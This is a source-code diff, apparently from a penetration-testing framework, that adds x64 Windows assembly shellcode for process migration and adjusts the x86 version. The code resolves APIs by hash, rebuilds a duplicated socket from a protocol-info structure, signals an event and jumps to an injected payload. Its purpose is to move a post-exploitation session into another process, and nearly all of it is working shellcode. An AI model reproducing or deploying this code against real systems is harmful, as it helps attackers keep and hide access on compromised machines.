diff --git a/external/source/shellcode/windows/x64/src/single/migrate.asm b/external/source/shellcode/windows/x64/src/single/migrate.asm new file mode 100644 index 0000000000..0acd0eb406 --- /dev/null +++ b/external/source/shellcode/windows/x64/src/single/migrate.asm @@ -0,0 +1,71 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, 2003, XP +; Architecture: x64 +; Version: 1.0 (Jan 2010) +; Size: 306 bytes +; Build: >build.py migrate +;-----------------------------------------------------------------------------; + +; typedef struct MigrateContext +; { +; union +; { +; HANDLE hEvent; +; BYTE bPadding1[8]; +; } e; +; union +; { +; LPVOID lpPayload; +; BYTE bPadding2[8]; +; } p; +; WSAPROTOCOL_INFO info; +; } MIGRATECONTEXT, * LPMIGRATECONTEXT; + +[BITS 64] +[ORG 0] + + cld ; Clear the direction flag. + mov rsi, rcx ; RCX is a pointer to our migration stub context + sub rsp, 0x2000 ; Alloc some space on stack + and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned + call start ; Call start, this pushes the address of 'api_call' onto the stack. +delta: ; +%include "./src/block/block_api.asm" +start: ; + pop rbp ; Pop off the address of 'api_call' for calling later. + ; setup the structures we need on the stack... + mov r14, 'ws2_32' ; + push r14 ; Push the bytes 'ws2_32',0,0 onto the stack. + mov rcx, rsp ; save pointer to the "ws2_32" string for LoadLibraryA call. + sub rsp, 408+8 ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment) + mov r13, rsp ; save pointer to the WSAData structure for WSAStartup call. + sub rsp, 0x28 ; alloc space for function calls + ; perform the call to LoadLibraryA... + mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call rbp ; LoadLibraryA( "ws2_32" ) + ; perform the call to WSAStartup... + mov rdx, r13 ; second param is a pointer to this stuct + push byte 2 ; + pop rcx ; set the param for the version requested + mov r10d, 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call rbp ; WSAStartup( 2, &WSAData ); + ; perform the call to WSASocketA... + xor r8, r8 ; we do not specify a protocol + push r8 ; push zero for the flags param. + push r8 ; push null for reserved parameter + lea r9, [rsi+16] ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext + push byte 1 ; + pop rdx ; SOCK_STREAM == 1 + push byte 2 ; + pop rcx ; AF_INET == 2 + mov r10d, 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 ); + mov rdi, rax ; save the socket for later + ; perform the call to SetEvent... + mov rcx, qword [rsi] ; Set the first parameter to the migrate event + mov r10d, 0x35269F1D ; hash( "kernel32.dll", "SetEvent" ) + call rbp ; SetEvent( hEvent ); + ; perform the call to the payload... + call qword [rsi+8] ; Call the payload... + \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/migrate.asm b/external/source/shellcode/windows/x86/src/single/migrate.asm index b3acad7220..7108031e5b 100644 --- a/external/source/shellcode/windows/x86/src/single/migrate.asm +++ b/external/source/shellcode/windows/x86/src/single/migrate.asm @@ -1,6 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Architecture: x86 ; Version: 1.0 (Jan 2010) ; Size: 219 bytes ; Build: >build.py migrate @@ -56,7 +57,7 @@ start: ; inc eax ; push eax ; Push AF_INET push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) - call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 ); xchg edi, eax ; Save the socket for later, we don't care about the value of eax after this push dword [esi] ; Push the event